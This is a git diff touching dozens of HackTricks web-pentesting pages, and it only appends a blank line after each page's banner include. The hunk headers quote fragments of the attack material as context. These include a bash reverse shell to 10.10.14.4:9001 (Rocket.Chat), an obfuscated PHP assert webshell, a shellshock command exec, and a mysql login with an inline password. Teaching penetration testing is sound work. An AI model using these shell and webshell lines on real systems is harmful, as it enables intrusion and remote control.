index faa3f5a0e..f288873e3 100644
--- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
+++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
@@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/bolt-cms.md b/src/network-services-pentesting/pentesting-web/bolt-cms.md
index 531ce9094..0adbd7c81 100644
--- a/src/network-services-pentesting/pentesting-web/bolt-cms.md
+++ b/src/network-services-pentesting/pentesting-web/bolt-cms.md
@@ -25,3 +25,4 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md
index 1445468a4..02a21b5e7 100644
--- a/src/network-services-pentesting/pentesting-web/buckets/README.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/README.md
@@ -9,3 +9,4 @@ Check this page if you want to learn more about enumerating and abusing Buckets: {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
index 039088149..914b893a3 100644
--- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
+++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
@@ -13,3 +13,4 @@ Learn more about Firebase in: {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md
index bc8970487..49ea51881 100644
--- a/src/network-services-pentesting/pentesting-web/cgi.md
+++ b/src/network-services-pentesting/pentesting-web/cgi.md
@@ -82,3 +82,4 @@ curl -i --data-binary "" "http://jh2i.com:500 {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/code-review-tools.md b/src/network-services-pentesting/pentesting-web/code-review-tools.md
index c4567022c..fe41da3ec 100644
--- a/src/network-services-pentesting/pentesting-web/code-review-tools.md
+++ b/src/network-services-pentesting/pentesting-web/code-review-tools.md
@@ -458,3 +458,4 @@ https://github.com/securego/gosec {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md
index 7034b5477..9c03cdd58 100644
--- a/src/network-services-pentesting/pentesting-web/django.md
+++ b/src/network-services-pentesting/pentesting-web/django.md
@@ -9,3 +9,4 @@ This HackerOne report provides a great, reproducible example of exploiting Djang +
diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
index 5af0303ed..696480748 100644
--- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
+++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
@@ -44,3 +44,4 @@ You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for e {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md
index 20beb62fc..061d8e5a9 100644
--- a/src/network-services-pentesting/pentesting-web/drupal/README.md
+++ b/src/network-services-pentesting/pentesting-web/drupal/README.md
@@ -100,3 +100,4 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
index cd55644a0..0b7b82e83 100644
--- a/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
+++ b/src/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
@@ -243,3 +243,4 @@ Thank you for taking the time to read this article, I hope it will help you get {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
index 16e28e491..58bbbb958 100644
--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md
@@ -345,3 +345,4 @@ npm start {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index e9f747099..89a666475 100644
--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -63,3 +63,4 @@ Exploit: {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
index 17560fbb8..400cbfbcc 100644
--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
@@ -107,3 +107,4 @@ window.electronSend = (event, data) => { {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
index 9bd595ca2..3d124aba5 100644
--- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
+++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
@@ -90,3 +90,4 @@ Specifically, the argument is replaced by changing the following two parts. {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md
index b05b0961c..ab4f82e9f 100644
--- a/src/network-services-pentesting/pentesting-web/flask.md
+++ b/src/network-services-pentesting/pentesting-web/flask.md
@@ -102,3 +102,4 @@ Could allow to introduce something like "@attacker.com" in order to cause a **SS {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/git.md b/src/network-services-pentesting/pentesting-web/git.md
index 9ace70c2c..7dc007fdb 100644
--- a/src/network-services-pentesting/pentesting-web/git.md
+++ b/src/network-services-pentesting/pentesting-web/git.md
@@ -23,3 +23,4 @@ Here you can find an study about github dorks: [https://securitytrails.com/blog/ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/golang.md b/src/network-services-pentesting/pentesting-web/golang.md
index 57245a24b..26eb1eeda 100644
--- a/src/network-services-pentesting/pentesting-web/golang.md
+++ b/src/network-services-pentesting/pentesting-web/golang.md
@@ -21,3 +21,4 @@ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/grafana.md b/src/network-services-pentesting/pentesting-web/grafana.md
index 6e79f7914..7fe30b7bb 100644
--- a/src/network-services-pentesting/pentesting-web/grafana.md
+++ b/src/network-services-pentesting/pentesting-web/grafana.md
@@ -13,3 +13,4 @@ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md
index f2f292839..a92f1630e 100644
--- a/src/network-services-pentesting/pentesting-web/graphql.md
+++ b/src/network-services-pentesting/pentesting-web/graphql.md
@@ -641,3 +641,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
index e9bef0f58..d17ed3224 100644
--- a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
+++ b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md
@@ -3,3 +3,4 @@ +
diff --git a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
index 33f13c1b5..49641cb88 100644
--- a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
+++ b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md
@@ -38,3 +38,4 @@ In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index 58de60f8e..97c65e8c5 100644
--- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -276,3 +276,4 @@ HTTP/1.1 200 OK {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/imagemagick-security.md b/src/network-services-pentesting/pentesting-web/imagemagick-security.md
index 649d88405..64de1705d 100644
--- a/src/network-services-pentesting/pentesting-web/imagemagick-security.md
+++ b/src/network-services-pentesting/pentesting-web/imagemagick-security.md
@@ -50,3 +50,4 @@ The effectiveness of a security policy can be confirmed using the `identify -lis {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/jboss.md b/src/network-services-pentesting/pentesting-web/jboss.md
index d2558cbff..4e6b7a6f9 100644
--- a/src/network-services-pentesting/pentesting-web/jboss.md
+++ b/src/network-services-pentesting/pentesting-web/jboss.md
@@ -26,3 +26,4 @@ Google Dorking can aid in identifying vulnerable servers with a query like: `inu {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/jira.md b/src/network-services-pentesting/pentesting-web/jira.md
index 0425cd63d..a50a9a45a 100644
--- a/src/network-services-pentesting/pentesting-web/jira.md
+++ b/src/network-services-pentesting/pentesting-web/jira.md
@@ -119,3 +119,4 @@ These are some of the actions a malicious plugin could perform: {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md
index adb006cf2..4918ec02c 100644
--- a/src/network-services-pentesting/pentesting-web/joomla.md
+++ b/src/network-services-pentesting/pentesting-web/joomla.md
@@ -124,3 +124,4 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/jsp.md b/src/network-services-pentesting/pentesting-web/jsp.md
index 0ded2a595..7fb904698 100644
--- a/src/network-services-pentesting/pentesting-web/jsp.md
+++ b/src/network-services-pentesting/pentesting-web/jsp.md
@@ -17,3 +17,4 @@ Accessing that web you may change all the links to request the information to _* {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
index 7e950195a..c7e66f555 100644
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -104,3 +104,4 @@ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md
index aa0855794..1f0b2c30b 100644
--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -110,3 +110,4 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php" {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/nextjs-1.md b/src/network-services-pentesting/pentesting-web/nextjs-1.md
index f729d7332..0d3ed2a7d 100644
--- a/src/network-services-pentesting/pentesting-web/nextjs-1.md
+++ b/src/network-services-pentesting/pentesting-web/nextjs-1.md
@@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md
index 574eee387..4a878b05f 100644
--- a/src/network-services-pentesting/pentesting-web/nextjs.md
+++ b/src/network-services-pentesting/pentesting-web/nextjs.md
@@ -1270,3 +1270,4 @@ const HeavyComponent = dynamic(() => import("../components/HeavyComponent"), { {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md
index b32e17b86..f2f676995 100644
--- a/src/network-services-pentesting/pentesting-web/nginx.md
+++ b/src/network-services-pentesting/pentesting-web/nginx.md
@@ -299,3 +299,4 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/nodejs-express.md b/src/network-services-pentesting/pentesting-web/nodejs-express.md
index e7d7f36cd..2fc6be4fa 100644
--- a/src/network-services-pentesting/pentesting-web/nodejs-express.md
+++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md
@@ -38,3 +38,4 @@ cookie-monster -e -f new_cookie.json -k secret +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 39a152d38..598c4de8d 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -508,3 +508,4 @@ $___($_[_]); // ASSERT($_POST[_]); {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
index 37d2cd3e4..278569b33 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
@@ -104,3 +104,4 @@ A method described in the [**original writeup**](https://swarm.ptsecurity.com/ex {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
index d65b3cf7d..2e7910796 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
@@ -70,3 +70,4 @@ $file = file_get_contents($url, false, $context); {{#include ../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index c7dc9e136..c00864e9c 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -821,3 +821,4 @@ get_meta_tags {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
index 7d2fccf75..e1f35255a 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md
@@ -87,3 +87,4 @@ This detailed walkthrough outlines the process of creating and deploying a PHP e {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
index b3d9886e8..4bf7a6ee0 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
@@ -57,3 +57,4 @@ echo file_get_contents($data_file); {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
index 499f8fc66..ef4568d94 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md
@@ -47,3 +47,4 @@ else {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
index 791dcfcf9..332701786 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md
@@ -31,3 +31,4 @@ if(function_exists('pcntl_exec')) { {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
index 4afbdcadc..8139e085d 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
@@ -11,3 +11,4 @@ php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
index ddf4ab608..275a89fcb 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md
@@ -31,3 +31,4 @@ win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
index ea97213ab..a67293d7a 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
@@ -19,3 +19,4 @@ var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
index 34bb66494..4f5b78c92 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
@@ -230,3 +230,4 @@ function pwn($cmd) { {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
index 13342c073..479e876fa 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -434,3 +434,4 @@ You can also find an analysis of the vulnerability [**here**](https://medium.com {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
index 0e1f5ad6b..5de0479fa 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md
@@ -76,3 +76,4 @@ exit {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
index 730020b2a..d2d36c32d 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md
@@ -33,3 +33,4 @@ echo "
CMD: {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
index 508cb746c..c51679b30 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md
@@ -19,3 +19,4 @@ while (!feof($a)) {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
index 9e49c9c0a..5c0d4445f 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md
@@ -134,3 +134,4 @@ echo "[-] Write failed. Exiting\n"; {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
index 13a2dd8df..e8a256123 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md
@@ -43,3 +43,4 @@ echo $MyBoot_ioncube; {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
index bf87f3f08..1652c1080 100644
--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md
@@ -32,3 +32,4 @@ echo shellshock($_REQUEST["cmd"]); {{#include ../../../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/prestashop.md b/src/network-services-pentesting/pentesting-web/prestashop.md
index 4fa8b20da..24d0e1df1 100644
--- a/src/network-services-pentesting/pentesting-web/prestashop.md
+++ b/src/network-services-pentesting/pentesting-web/prestashop.md
@@ -10,3 +10,4 @@ {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/put-method-webdav.md b/src/network-services-pentesting/pentesting-web/put-method-webdav.md
index 8c744cbf3..122249ee4 100644
--- a/src/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/src/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -99,3 +99,4 @@ wget --user --ask-password http://domain/path/to/webdav/ -O - -q {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/python.md b/src/network-services-pentesting/pentesting-web/python.md
index 4e2c56211..42da06f2d 100644
--- a/src/network-services-pentesting/pentesting-web/python.md
+++ b/src/network-services-pentesting/pentesting-web/python.md
@@ -27,3 +27,4 @@ test a possible **code execution**, using the function _str()_: {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/rocket-chat.md b/src/network-services-pentesting/pentesting-web/rocket-chat.md
index 5056c2856..fccd6b33b 100644
--- a/src/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/src/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -39,3 +39,4 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") {{#include ../../banners/hacktricks-training.md}} +
diff --git a/src/network-services-pentesting/pentesting-web/special-http-headers.md b/src/network-services-pentesting/pentesting-web/special-http-headers.md
index 6dda47b0c..9c1006364 100644
--- a/src/network-services-pentesting/pentesting-web/special-http-headers.md
